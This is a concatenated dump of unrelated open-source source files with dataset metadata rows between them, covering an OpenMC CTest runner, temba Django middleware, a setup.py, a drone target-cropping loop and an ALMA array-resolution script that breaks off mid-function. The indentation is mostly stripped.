set(CTEST_UPDATE_COMMAND "git")
set(CTEST_CONFIGURE_COMMAND "${{CMAKE_COMMAND}} -H${{CTEST_SOURCE_DIRECTORY}} -B${{CTEST_BINARY_DIRECTORY}} ${{CTEST_BUILD_OPTIONS}}")
set(CTEST_MEMORYCHECK_COMMAND "{valgrind_cmd}")
set(CTEST_MEMORYCHECK_COMMAND_OPTIONS "--tool=memcheck --leak-check=yes --show-reachable=yes --num-callers=20 --track-fds=yes")
#set(CTEST_MEMORYCHECK_SUPPRESSIONS_FILE ${{CTEST_SOURCE_DIRECTORY}}/../tests/valgrind.supp)
set(MEM_CHECK {mem_check})
if(MEM_CHECK)
set(ENV{{MEM_CHECK}} ${{MEM_CHECK}})
endif()
set(CTEST_COVERAGE_COMMAND "gcov")
set(COVERAGE {coverage})
set(ENV{{COVERAGE}} ${{COVERAGE}})
{subproject}
ctest_start("{dashboard}")
ctest_configure(RETURN_VALUE res)
{update}
ctest_build(RETURN_VALUE res)
if(NOT MEM_CHECK)
ctest_test({tests} PARALLEL_LEVEL {n_procs}, RETURN_VALUE res)
endif()
if(MEM_CHECK)
ctest_memcheck({tests} RETURN_VALUE res)
endif(MEM_CHECK)
if(COVERAGE)
ctest_coverage(RETURN_VALUE res)
endif(COVERAGE)
{submit}
if (res EQUAL 0)
else()
message(FATAL_ERROR "")
endif()
"""
# Define test data structure
tests = OrderedDict()
def cleanup(path):
"""Remove generated output files."""
for dirpath, dirnames, filenames in os.walk(path):
for fname in filenames:
for ext in ['.h5', '.ppm', '.voxel']:
if fname.endswith(ext) and fname != '1d_mgxs.h5':
os.remove(os.path.join(dirpath, fname))
def which(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
class Test(object):
def __init__(self, name, debug=False, optimize=False, mpi=False, openmp=False,
phdf5=False, valgrind=False, coverage=False):
self.name = name
self.debug = debug
self.optimize = optimize
self.mpi = mpi
self.openmp = openmp
self.phdf5 = phdf5
self.valgrind = valgrind
self.coverage = coverage
self.success = True
self.msg = None
self.skipped = False
self.cmake = ['cmake', '-H..', '-Bbuild',
'-DPYTHON_EXECUTABLE=' + sys.executable]
# Check for MPI
if self.mpi:
if os.path.exists(os.path.join(MPI_DIR, 'bin', 'mpifort')):
self.fc = os.path.join(MPI_DIR, 'bin', 'mpifort')
else:
self.fc = os.path.join(MPI_DIR, 'bin', 'mpif90')
self.cc = os.path.join(MPI_DIR, 'bin', 'mpicc')
else:
self.fc = FC
self.cc = CC
# Sets the build name that will show up on the CDash
def get_build_name(self):
self.build_name = options.project + '_' + self.name
return self.build_name
# Sets up build options for various tests. It is used both
# in script and non-script modes
def get_build_opts(self):
build_str = ""
if self.debug:
build_str += "-Ddebug=ON "
if self.optimize:
build_str += "-Doptimize=ON "
if self.openmp:
build_str += "-Dopenmp=ON "
if self.coverage:
build_str += "-Dcoverage=ON "
self.build_opts = build_str
return self.build_opts
# Write out the ctest script to tests directory
def create_ctest_script(self, ctest_vars):
with open('ctestscript.run', 'w') as fh:
fh.write(ctest_str.format(**ctest_vars))
# Runs the ctest script which performs all the cmake/ctest/cdash
def run_ctest_script(self):
os.environ['FC'] = self.fc
os.environ['CC'] = self.cc
if self.mpi:
os.environ['MPI_DIR'] = MPI_DIR
if self.phdf5:
os.environ['HDF5_ROOT'] = PHDF5_DIR
else:
os.environ['HDF5_ROOT'] = HDF5_DIR
rc = call(['ctest', '-S', 'ctestscript.run','-V'])
if rc != 0:
self.success = False
self.msg = 'Failed on ctest script.'
# Runs cmake when in non-script mode
def run_cmake(self):
os.environ['FC'] = self.fc
os.environ['CC'] = self.cc
if self.mpi:
os.environ['MPI_DIR'] = MPI_DIR
if self.phdf5:
os.environ['HDF5_ROOT'] = PHDF5_DIR
else:
os.environ['HDF5_ROOT'] = HDF5_DIR
build_opts = self.build_opts.split()
self.cmake += build_opts
rc = call(self.cmake)
if rc != 0:
self.success = False
self.msg = 'Failed on cmake.'
# Runs make when in non-script mode
def run_make(self):
if not self.success:
return
# Default make string
make_list = ['make','-s']
# Check for parallel
if options.n_procs is not None:
make_list.append('-j')
make_list.append(options.n_procs)
# Run make
rc = call(make_list)
if rc != 0:
self.success = False
self.msg = 'Failed on make.'
# Runs ctest when in non-script mode
def run_ctests(self):
if not self.success:
return
# Default ctest string
ctest_list = ['ctest']
# Check for parallel
if options.n_procs is not None:
ctest_list.append('-j')
ctest_list.append(options.n_procs)
# Check for subset of tests
if options.regex_tests is not None:
ctest_list.append('-R')
ctest_list.append(options.regex_tests)
# Run ctests
rc = call(ctest_list)
if rc != 0:
self.success = False
self.msg = 'Failed on testing.'
# Simple function to add a test to the global tests dictionary
def add_test(name, debug=False, optimize=False, mpi=False, openmp=False,\
phdf5=False, valgrind=False, coverage=False):
tests.update({name: Test(name, debug, optimize, mpi, openmp, phdf5,
valgrind, coverage)})
# List of all tests that may be run. User can add -C to command line to specify
# a subset of these configurations
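# Example invocations (illustrative only, not part of the original script):
#   python run_tests.py -j 4 -C "phdf5"              # build configs whose name matches "phdf5"
#   python run_tests.py -C "omp-hdf5-debug" -R seed  # one config, only tests matching "seed"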
add_test('hdf5-normal')
add_test('hdf5-debug', debug=True)
add_test('hdf5-optimize', optimize=True)
add_test('omp-hdf5-normal', openmp=True)
add_test('omp-hdf5-debug', openmp=True, debug=True)
add_test('omp-hdf5-optimize', openmp=True, optimize=True)
add_test('mpi-hdf5-normal', mpi=True)
add_test('mpi-hdf5-debug', mpi=True, debug=True)
add_test('mpi-hdf5-optimize', mpi=True, optimize=True)
add_test('phdf5-normal', mpi=True, phdf5=True)
add_test('phdf5-debug', mpi=True, phdf5=True, debug=True)
add_test('phdf5-optimize', mpi=True, phdf5=True, optimize=True)
add_test('phdf5-omp-normal', mpi=True, phdf5=True, openmp=True)
add_test('phdf5-omp-debug', mpi=True, phdf5=True, openmp=True, debug=True)
add_test('phdf5-omp-optimize', mpi=True, phdf5=True, openmp=True, optimize=True)
add_test('hdf5-debug_valgrind', debug=True, valgrind=True)
add_test('hdf5-debug_coverage', debug=True, coverage=True)
# Check to see if we should just print build configuration information to user
if options.list_build_configs:
for key in tests:
print('Configuration Name: {0}'.format(key))
print(' Debug Flags:..........{0}'.format(tests[key].debug))
print(' Optimization Flags:...{0}'.format(tests[key].optimize))
print(' MPI Active:...........{0}'.format(tests[key].mpi))
print(' OpenMP Active:........{0}'.format(tests[key].openmp))
print(' Valgrind Test:........{0}'.format(tests[key].valgrind))
print(' Coverage Test:........{0}\n'.format(tests[key].coverage))
exit()
# Delete items of dictionary that don't match regular expression
if options.build_config is not None:
to_delete = []
for key in tests:
if not re.search(options.build_config, key):
to_delete.append(key)
for key in to_delete:
del tests[key]
# Check for dashboard and determine whether to push results to server
# Note that there are only 3 basic dashboards:
# Experimental, Nightly, Continuous. On the CDash end, these can be
# reorganized into groups when a hostname, dashboard and build name
# are matched.
if options.dash is None:
dash = 'Experimental'
submit = ''
else:
dash = options.dash
submit = 'ctest_submit()'
# Check for update command, which will run git fetch/merge and will delete
# any changes to repo that were not pushed to remote origin
if options.update:
update = 'ctest_update()'
else:
update = ''
# Check for CTest scipts mode
# Sets up whether we should use just the basic ctest command or use
# CTest scripting to perform tests.
if not options.dash is None or options.script:
script_mode = True
else:
script_mode = False
# Setup CTest script vars. Not used in non-script mode
pwd = os.getcwd()
ctest_vars = {
'source_dir': os.path.join(pwd, os.pardir),
'build_dir': os.path.join(pwd, 'build'),
'host_name': socket.gethostname(),
'dashboard': dash,
'submit': submit,
'update': update,
'n_procs': options.n_procs
}
# Check project name
subprop = """set_property(GLOBAL PROPERTY SubProject {0})"""
if options.project == "" :
ctest_vars.update({'subproject':''})
elif options.project == 'develop':
ctest_vars.update({'subproject':''})
else:
ctest_vars.update({'subproject':subprop.format(options.project)})
# Set up default valgrind tests (subset of all tests)
# Currently takes too long to run all the tests with valgrind
# Only used in script mode
valgrind_default_tests = "cmfd_feed|confidence_intervals|\
density|eigenvalue_genperbatch|energy_grid|entropy|\
lattice_multiple|output|plotreflective_plane|\
rotation|salphabetascore_absorption|seed|source_energy_mono|\
sourcepoint_batch|statepoint_interval|survival_biasing|\
tally_assumesep|translation|uniform_fs|universe|void"
# Delete items of dictionary if valgrind or coverage and not in script mode
to_delete = []
if not script_mode:
for key in tests:
if re.search('valgrind|coverage', key):
to_delete.append(key)
for key in to_delete:
del tests[key]
# Check if tests empty
if len(list(tests.keys())) == 0:
print('No tests to run.')
exit()
# Begin testing
shutil.rmtree('build', ignore_errors=True)
cleanup('.')
for key in iter(tests):
test = tests[key]
# Extra display if not in script mode
if not script_mode:
print('-'*(len(key) + 6))
print(key + ' tests')
print('-'*(len(key) + 6))
sys.stdout.flush()
# Verify fortran compiler exists
if which(test.fc) is None:
        test.msg = 'Compiler not found: {0}'.format(test.fc)
        test.success = False
continue
# Verify valgrind command exists
if test.valgrind:
valgrind_cmd = which('valgrind')
if valgrind_cmd is None:
            test.msg = 'No valgrind executable found.'
            test.success = False
continue
else:
valgrind_cmd = ''
# Verify gcov/lcov exist
if test.coverage:
if which('gcov') is None:
            test.msg = 'No gcov executable found.'
            test.success = False
continue
# Set test specific CTest script vars. Not used in non-script mode
ctest_vars.update({'build_name': test.get_build_name()})
ctest_vars.update({'build_opts': test.get_build_opts()})
ctest_vars.update({'mem_check': test.valgrind})
ctest_vars.update({'coverage': test.coverage})
ctest_vars.update({'valgrind_cmd': valgrind_cmd})
# Check for user custom tests
# INCLUDE is a CTest command that allows for a subset
# of tests to be executed. Only used in script mode.
if options.regex_tests is None:
ctest_vars.update({'tests' : ''})
# No user tests, use default valgrind tests
if test.valgrind:
ctest_vars.update({'tests' : 'INCLUDE {0}'.
format(valgrind_default_tests)})
else:
ctest_vars.update({'tests' : 'INCLUDE {0}'.
format(options.regex_tests)})
# Main part of code that does the ctest execution.
# It is broken up by two modes, script and non-script
if script_mode:
# Create ctest script
test.create_ctest_script(ctest_vars)
# Run test
test.run_ctest_script()
else:
# Run CMAKE to configure build
test.run_cmake()
# Go into build directory
os.chdir('build')
# Build OpenMC
test.run_make()
# Run tests
test.run_ctests()
# Leave build directory
os.chdir(os.pardir)
# Copy over log file
if script_mode:
logfile = glob.glob('build/Testing/Temporary/LastTest_*.log')
else:
logfile = glob.glob('build/Testing/Temporary/LastTest.log')
if len(logfile) > 0:
logfilename = os.path.split(logfile[0])[1]
logfilename = os.path.splitext(logfilename)[0]
logfilename = logfilename + '_{0}.log'.format(test.name)
shutil.copy(logfile[0], logfilename)
# For coverage builds, use lcov to generate HTML output
if test.coverage:
if which('lcov') is None or which('genhtml') is None:
print('No lcov/genhtml command found. '
'Could not generate coverage report.')
else:
shutil.rmtree('coverage', ignore_errors=True)
call(['lcov', '--directory', '.', '--capture',
'--output-file', 'coverage.info'])
call(['genhtml', '--output-directory', 'coverage', 'coverage.info'])
os.remove('coverage.info')
if test.valgrind:
# Copy memcheck output to memcheck directory
shutil.rmtree('memcheck', ignore_errors=True)
os.mkdir('memcheck')
memcheck_out = glob.glob('build/Testing/Temporary/MemoryChecker.*.log')
for fname in memcheck_out:
shutil.copy(fname, 'memcheck/')
# Remove generated XML files
xml_files = check_output(['git', 'ls-files', '.', '--exclude-standard',
'--others']).split()
for f in xml_files:
os.remove(f)
# Clear build directory and remove binary and hdf5 files
shutil.rmtree('build', ignore_errors=True)
if script_mode:
os.remove('ctestscript.run')
cleanup('.')
# Print out summary of results
print('\n' + '='*54)
print('Summary of Compilation Option Testing:\n')
if sys.stdout.isatty():
OK = '\033[92m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
else:
OK = ''
FAIL = ''
ENDC = ''
BOLD = ''
return_code = 0
for test in tests:
print(test + '.'*(50 - len(test)), end='')
if tests[test].success:
print(BOLD + OK + '[OK]' + ENDC)
else:
print(BOLD + FAIL + '[FAILED]' + ENDC)
print(' '*len(test)+tests[test].msg)
return_code = 1
sys.exit(return_code)
| mit | -5,832,388,550,918,468,000 | 31.965009 | 134 | 0.611955 | false |
tsotetsi/textily-web | temba/middleware.py | 1 | 5471 | from __future__ import absolute_import, unicode_literals
import pstats
import traceback
import copy
from cStringIO import StringIO
from django.conf import settings
from django.db import transaction
from django.utils import timezone, translation
from temba.orgs.models import Org
from temba.contacts.models import Contact
try:
import cProfile as profile
except ImportError: # pragma: no cover
import profile
class ExceptionMiddleware(object):
def process_exception(self, request, exception):
if settings.DEBUG:
traceback.print_exc(exception)
return None
class BrandingMiddleware(object):
@classmethod
def get_branding_for_host(cls, host):
# ignore subdomains
if len(host.split('.')) > 2: # pragma: needs cover
host = '.'.join(host.split('.')[-2:])
# prune off the port
if ':' in host:
host = host[0:host.rindex(':')]
# our default branding
branding = settings.BRANDING.get(settings.DEFAULT_BRAND)
branding['host'] = settings.DEFAULT_BRAND
# override with site specific branding if we have that
site_branding = settings.BRANDING.get(host, None)
if site_branding:
branding = copy.deepcopy(branding)
branding.update(site_branding)
branding['host'] = host
return branding
def process_request(self, request):
"""
Check for any branding options based on the current host
"""
host = 'localhost'
try:
host = request.get_host()
except Exception: # pragma: needs cover
traceback.print_exc()
request.branding = BrandingMiddleware.get_branding_for_host(host)
class ActivateLanguageMiddleware(object):
def process_request(self, request):
user = request.user
language = request.branding.get('language', settings.DEFAULT_LANGUAGE)
if user.is_anonymous() or user.is_superuser:
translation.activate(language)
else:
user_settings = user.get_settings()
translation.activate(user_settings.language)
class OrgTimezoneMiddleware(object):
def process_request(self, request):
user = request.user
org = None
if not user.is_anonymous():
org_id = request.session.get('org_id', None)
if org_id:
org = Org.objects.filter(is_active=True, pk=org_id).first()
# only set the org if they are still a user or an admin
if org and (user.is_superuser or user.is_staff or user in org.get_org_users()):
user.set_org(org)
# otherwise, show them what orgs are available
else:
user_orgs = user.org_admins.all() | user.org_editors.all() | user.org_viewers.all() | user.org_surveyors.all()
user_orgs = user_orgs.distinct('pk')
if user_orgs.count() == 1:
user.set_org(user_orgs[0])
org = request.user.get_org()
if org:
timezone.activate(org.timezone)
else:
timezone.activate(settings.USER_TIME_ZONE)
return None
class FlowSimulationMiddleware(object):
def process_request(self, request):
Contact.set_simulation(False)
return None
class ProfilerMiddleware(object): # pragma: no cover
"""
Simple profile middleware to profile django views. To run it, add ?prof to
the URL like this:
http://localhost:8000/view/?prof
Optionally pass the following to modify the output:
?sort => Sort the output by a given metric. Default is time.
See http://docs.python.org/2/library/profile.html#pstats.Stats.sort_stats
for all sort options.
?count => The number of rows to display. Default is 100.
This is adapted from an example found here:
http://www.slideshare.net/zeeg/django-con-high-performance-django-presentation.
"""
def can(self, request):
return settings.DEBUG and 'prof' in request.GET
def process_view(self, request, callback, callback_args, callback_kwargs):
if self.can(request):
self.profiler = profile.Profile()
args = (request,) + callback_args
return self.profiler.runcall(callback, *args, **callback_kwargs)
def process_response(self, request, response):
if self.can(request):
self.profiler.create_stats()
io = StringIO()
stats = pstats.Stats(self.profiler, stream=io)
stats.strip_dirs().sort_stats(request.GET.get('sort', 'time'))
stats.print_stats(int(request.GET.get('count', 100)))
response.content = '<pre>%s</pre>' % io.getvalue()
return response
class NonAtomicGetsMiddleware(object):
"""
Django's non_atomic_requests decorator gives us no way of enabling/disabling transactions depending on the request
type. This middleware will make the current request non-atomic if an _non_atomic_gets attribute is set on the view
function, and if the request method is GET.
"""
def process_view(self, request, view_func, view_args, view_kwargs):
if getattr(view_func, '_non_atomic_gets', False):
if request.method.lower() == 'get':
transaction.non_atomic_requests(view_func)
else:
view_func._non_atomic_requests = set()
return None
| agpl-3.0 | 4,714,688,521,143,626,000 | 31.182353 | 126 | 0.628039 | false |
vuolter/autoupgrade | setup.py | 1 | 1152 | # -*- coding: utf-8 -*-
from setuptools import setup
setup(
name="autoupgrade-ng",
version="0.3.0",
author="Walter Purcaro",
author_email="[email protected]",
description="Automatic upgrade of PyPI packages",
long_description=open('README.rst').read(),
keywords=['autoupgrade', 'pip-upgrade', 'pip'],
packages=['autoupgrade'],
include_package_data=True,
url="https://github.com/vuolter/autoupgrade",
download_url="https://github.com/vuolter/autoupgrade/releases",
install_requires=['pip'],
obsoletes=['autoupgrade'],
license='MIT License',
zip_safe=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Other Environment",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: System :: Software Distribution",
"Topic :: Utilities"
]
)
| mit | -4,360,612,504,642,803,000 | 32.882353 | 67 | 0.626736 | false |
FlintHill/SUAS-Competition | SUASSystem/SUASSystem/image_processing.py | 1 | 3266 | from time import sleep
from PIL import Image
import os
import math
import random
from .utils import *
from UpdatedImageProcessing import *
from .settings import GCSSettings
from .converter_functions import inverse_haversine, get_mission_json
from .location import Location
"""
This file contains our image processing logic and utilizes our cropper function.
"""
def run_img_proc_process(logger_queue, location_log, targets_to_submit, interop_client_array):
while True:
if len(targets_to_submit) > 0:
target_characteristics = targets_to_submit.pop(0)
target_time = get_image_timestamp_from_metadata("static/imgs/" + target_characteristics["base_image_filename"])
closest_time_index = 0
least_time_difference = location_log[0]["epoch_time"]
for index in range(len(location_log)):
difference_in_times = target_time - location_log[index]["epoch_time"]
if abs(difference_in_times) <= least_time_difference:
closest_time_index = index
least_time_difference = difference_in_times
drone_gps_location = Location(location_log[closest_time_index]["latitude"], location_log[closest_time_index]["longitude"], location_log[closest_time_index]["altitude"])
image = Image.open("static/imgs/" + target_characteristics["base_image_filename"])
image_midpoint = (image.width / 2, image.height / 2)
target_midpoint = ((target_characteristics["target_top_left"][0] + target_characteristics["target_bottom_right"][0]) / 2, (target_characteristics["target_top_left"][1] + target_characteristics["target_bottom_right"][1]) / 2)
target_location = get_target_gps_location(image_midpoint, target_midpoint, drone_gps_location)
target_characteristics["latitude"] = target_location.get_lat()
target_characteristics["longitude"] = target_location.get_lon()
original_image_path = "static/all_imgs/" + target_characteristics["base_image_filename"]
cropped_target_path = "static/crops/" + str(len(os.listdir('static/crops'))) + ".jpg"
cropped_target_data_path = "static/crops/" + str(len(os.listdir('static/crops'))) + ".json"
crop_target(original_image_path, cropped_target_path, target_characteristics["target_top_left"], target_characteristics["target_bottom_right"])
save_json_data(cropped_target_data_path, target_characteristics)
# comment out these lines if testing w/o interop
if target_characteristics["type"] == "standard":
interop_client_array[0].post_manual_standard_target(target_characteristics, cropped_target_path)
elif target_characteristics["type"] == "emergent":
interop_client_array[0].post_manual_emergent_target(target_characteristics, cropped_target_path)
sleep(0.1)
def run_autonomous_img_proc_process(logger_queue, interop_client_array, img_proc_status, autonomous_targets_to_submit):
while True:
if len(autonomous_targets_to_submit) > 0:
target_info = autonomous_targets_to_submit.pop()
interop_client_array[0].post_autonomous_target(target_info)
sleep(0.5)
| mit | -1,299,459,855,585,969,200 | 56.298246 | 236 | 0.672994 | false |
itoledoc/gWTO2 | arrayResolution2p.py | 1 | 23318 | #!/usr/bin/python
"""
Script to return the Cycle 2 arrays for a given LAS, Angular Resolution
HISTORY:
2012.10.11:
- first shot
- Cycle 1 setup
2012.11.20:
- Adding resolution, LAS for different declination
2012.12.27:
- adding a filter if no configuration is found to multiply by a fudge factor
2013.03.04:
- Adding geometric average for the spatial resolution and test on twice the spatial resolution
2013.03.05:
- fixing bugs
- adding extra information (THB, array)
2013.03.11:
- Removing the condition about AR/2. for the array.
2013.03.18:
- Adding point source option
- putting the AR/2. if it is not a point source
2013.03.20:
- changing the PS option to LAS = 0
2013.05.02:
- changing slightly the conditions of acceptance (>= instead of >)
2013.05.03:
- print version
- try increasing fudge factor until it gets a solution
2013.05.10:
- Add silentRun for P2G (FG)
2013.12.13:
- Name change for Cycle2 and update of the pickle.
- Update of the finder (multi-configuration)
2013.12.16:
- new find_array3 for the multi-configuration
2014.01.28:
- fix the fudge relaxation for the resolution.
2014.05.22:
- New algorithm to deal with minAr, maxAr
2014.05.22:
- ugly fixConfiguration when OT forces for two configurations
2014.06.02
- fixing the matchAR
- relaxing the condition to allow a better AR with a sufficient LAS (0.9)
2014.06.05:
- adapting the case 7-m+12-m
2014.06.13:
- fix an edge problem when LAS = 0
RUN:
Input: RES (arcsec) LAS (arcsec) FREQ (GHz) Y/N (ACA 7-m) numberOf12mArrays
> python arrayResolution2p.py 0.2 2.5 640. Y 1    ## if LAS = 0. a point source is assumed
"""
__author__ = "ALMA : SL, AL, FG"
__version__ = "[email protected]"
import sys, pickle, os
import math
### ALMA
LATITUDE_ALMA = -23.03
DEG2RAD = math.pi/180.
class arrayRes:
def __init__(self, arguments):
self.LAS = [26.1,26.3,18.0,18.0,14.4,9.1,9.1]
self.LASA = [44.0,44.0,44.0,44.0,14.4,9.1,9.1]
self.LAST = [390.0,390.0,390.0,390.0,14.4,9.,9.1]
self.res = [3.73,2.04,1.40,1.11,0.75,0.57,0.41]
self.frequencyReference = 100.
self.lasObs = 0.
self.resObs = 0.
self.resObsOriginal = 0
self.lasOriginal = 0
self.freqObs = 0.
self.pointSource = False
self.silent = True
self.nof12m = 1
self.minAR = [0.,10000.]
self.maxAR = [0, 0.]
self.args = arguments
self.array = {0:"C34-1",1:"C34-2",2:"C34-3",3:"C34-4",4:"C34-5",5:"C34-6",6:"C34-7"}
self.read_cycle2()
def set_las(self,las):
"Set the LAS of the observation"
self.lasObs = las
self.lasOriginal = las
def set_res(self,res):
"Set the angular resolution of the observation"
self.resObs = res
self.resOriginal = res
def set_frequency(self,freq):
"Set the frequency of the observation"
# if ((freq>=64.)&(freq<=116.)): freq = 100.
# if ((freq>=211.)&(freq<=275.)): freq = 230.
# if ((freq>=275.)&(freq<=373.)): freq = 345.
# if ((freq>=602.)&(freq<=720.)): freq = 675.
self.freqObs = freq
def set_declination(self,declination):
"Set the representative declination of the observation"
self.declination = declination
def set_aca(self,aca):
"Set the frequency of the observation"
self.acaUse = aca
def set_12m(self,numberof12m):
"Set the number of 12m array configuration"
self.nof12m = numberof12m
def set_pointSource(self, isPS):
"Set True if point source"
self.pointSource = isPS
def read_cycle2(self, directory=None):
directory = os.environ['WTO'] + 'conf/'
self.data = []
f = open(directory+'Resolution-C34-1.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-2.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-3.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-4.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-5.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-6.pickle')
self.data.append(pickle.load(f))
f.close()
f = open(directory+'Resolution-C34-7.pickle')
self.data.append(pickle.load(f))
f.close()
### ACA ####
f = open(directory+'Resolution-ACA-std.pickle')
self.aca = pickle.load(f)
f.close()
def find_array(self):
"Find the array with the obs. input"
TP='N'
arrayMatch = []
scalingFrequency = self.frequencyReference / self.freqObs
if (self.acaUse == 'Y'):
self.LAS=self.LAST
if self.lasObs / scalingFrequency > self.LASA[1]:
TP='Y'
for arr in self.array :
if self.silent:
print self.LAS[arr] * scalingFrequency, self.res[arr] * scalingFrequency
if self.LAS[arr] * scalingFrequency >= self.lasObs and self.res[arr] * scalingFrequency <= self.resObs:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
return arrayMatch,TP
def find_array2(self,verbose = False):
"Find the array with the obs. input using the precise resolution, LAS..."
TP = 'N'
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
index = int(math.floor(((self.declination-decMin) / deltaDec)))
# print index
### No ACA
arrayMatch = []
for arr in self.array :
lasArr = self.data[arr][3][index]
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
lasFreqArr = lasArr * scalingFrequency
spatialResolutionArr = resArr * scalingFrequency
res_thb = self.res[arr]*scalingFrequency
las_thb = self.LAS[arr]*scalingFrequency
elevation_factor = abs(1./math.sin(DEG2RAD*(90.-LATITUDE_ALMA+self.declination)))
res_estimated = math.sqrt(res_thb*res_thb*elevation_factor)
las_estimated = math.sqrt(las_thb*las_thb*elevation_factor)
if self.silent:
if(verbose):
print("# Array: %s, LAS: %5.2f, RES: %5.2f"%(self.array[arr],lasFreqArr, spatialResolutionArr ))
print("# THB: LAS: %5.2f, RES: %5.2f")%(las_estimated,res_estimated)
# print("#")
if self.pointSource:
if lasFreqArr >= self.lasObs and self.resObs >= spatialResolutionArr :
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
else :
if lasFreqArr >= self.lasObs and self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
### ACA used
if (self.acaUse == 'Y'):
arrayMatch = []
for arr in self.array:
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
spatialResolutionArr = resArr*scalingFrequency
##
if self.pointSource:
if self.resObs > spatialResolutionArr and arr < 4:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
else :
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. and arr < 4:
arrayMatch.append(self.array[arr])
else:
arrayMatch.append("")
lasACA = self.aca[3][index]
if lasACA*scalingFrequency <= self.lasObs:
TP = 'Y'
return arrayMatch, TP
def find_array3(self,verbose = False):
"Find the array with the obs. input using the precise resolution, LAS.... It takes into account a multi-configuration"
TP = 'N'
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
index = int(math.floor(((self.declination-decMin) / deltaDec)))
# Cycle 2 Match Array
matchArrayCycle2 = {3:0,4:1,5:2,6:2}
###
arrayMatchRes = []
arrayMatchLAS = []
lasFreqArrAll = []
resFreqArrAll = []
for arr in self.array :
arrayMatchRes.append("")
arrayMatchLAS.append("")
lasArr = self.data[arr][3][index]
resArr = math.sqrt(self.data[arr][1][index] * self.data[arr][2][index])
lasFreqArr = lasArr * scalingFrequency
spatialResolutionArr = resArr * scalingFrequency
lasFreqArrAll.append(lasFreqArr)
resFreqArrAll.append(spatialResolutionArr)
res_thb = self.res[arr]*scalingFrequency
las_thb = self.LAS[arr]*scalingFrequency
elevation_factor = abs(1./ math.sin(DEG2RAD*(90.-LATITUDE_ALMA+self.declination)))
res_estimated = math.sqrt(res_thb*res_thb*elevation_factor)
las_estimated = math.sqrt(las_thb*las_thb*elevation_factor)
if self.silent:
if(verbose):
print("# Array: %s, LAS: %5.2f, RES: %5.2f"%(self.array[arr],lasFreqArr, spatialResolutionArr ))
print("# THB: LAS: %5.2f, RES: %5.2f")%(las_estimated,res_estimated)
# print("#")
########################### Comparison #######################
notFound = True
notFoundLAS = True
for arr in self.array :
lasFreqArr = lasFreqArrAll[arr]
spatialResolutionArr = resFreqArrAll[arr]
if self.pointSource:
if self.resObs >= spatialResolutionArr :
arrayMatchRes[arr] = self.array[arr]
notFound = False
else :
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatchRes[arr] = self.array[arr]
notFound = False
if lasFreqArr <= self.lasObs and arr > 2:
arrayMatchLAS[matchArrayCycle2[arr]] = self.array[matchArrayCycle2[arr]]
if lasFreqArrAll[matchArrayCycle2[arr]] <= self.lasObs and matchArrayCycle2[arr] > 0:
for i in range(0,matchArrayCycle2[arr]):
if lasFreqArrAll[i] >= self.lasObs :
arrayMatchLAS[i] = self.array[i]
notFoundLAS = False
### ACA used ###############
if (self.acaUse == 'Y'):
arrayMatchRes = []
arrayMatchLAS = []
for arr in self.array :
arrayMatchRes.append("")
arrayMatchLAS.append("")
for arr in self.array:
spatialResolutionArr = resFreqArrAll[arr]
if self.resObs >= spatialResolutionArr and spatialResolutionArr >= self.resObs / 2. :
arrayMatchRes[arr] = self.array[arr]
notFound = False
if arr > 2:
arrayMatchLAS[matchArrayCycle2[arr]] = self.array[matchArrayCycle2[arr]]
lasACA = self.aca[3][index]
if lasACA*scalingFrequency <= self.lasObs:
TP = 'Y'
return [arrayMatchRes,arrayMatchLAS] , TP , notFound, notFoundLAS
def matchAR(self,resLas):
"Match the spatial resolution for the number of configurations"
scalingFrequency = self.frequencyReference / self.freqObs
nData = len(self.data[0][0])
decMin = self.data[0][0][0]
decMax = self.data[0][0][nData-1]
deltaDec = (decMax-decMin)/nData
zenith = int(math.floor(((-23.0-decMin) / deltaDec)))
## check if the resolution is lower than the most compact one
##
b0_12compact = self.data[0][1][zenith] * scalingFrequency
b1_12compact = self.data[0][2][zenith] * scalingFrequency
resCompact = math.sqrt(b0_12compact*b1_12compact)
maxArrayCycle2 = 6
b0_12ext = self.data[maxArrayCycle2][1][zenith] * scalingFrequency
b1_12ext = self.data[maxArrayCycle2][2][zenith] * scalingFrequency
resExt = math.sqrt(b0_12ext*b1_12ext)
########
#print resCompact
#print resExt
if self.nof12m == 1:
self.maxAR[0] = self.resOriginal * 1.1
self.minAR[0] = self.resOriginal * 0.7
## We relax the condition to get at least 0.9 LAS
for arr in self.array:
lasArr = self.data[arr][3][zenith] *scalingFrequency
b0 = self.data[arr][1][zenith] * scalingFrequency
b1 = self.data[arr][2][zenith] * scalingFrequency
res = math.sqrt(b0*b1)
if lasArr > 0.9 * self.lasObs and res < self.minAR[0] :
# print res
self.minAR[0] = res
if self.resOriginal > resCompact and self.lasObs != 0.:
